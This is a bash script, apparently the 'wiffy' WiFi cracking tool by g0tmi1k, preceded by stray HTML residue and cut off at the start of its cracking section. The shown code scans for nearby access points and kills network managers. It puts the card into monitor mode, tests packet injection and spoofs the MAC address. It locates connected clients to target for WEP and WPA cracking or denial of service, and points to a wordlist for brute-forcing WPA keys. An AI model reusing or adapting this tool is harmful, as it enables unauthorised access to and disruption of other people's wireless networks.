![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action 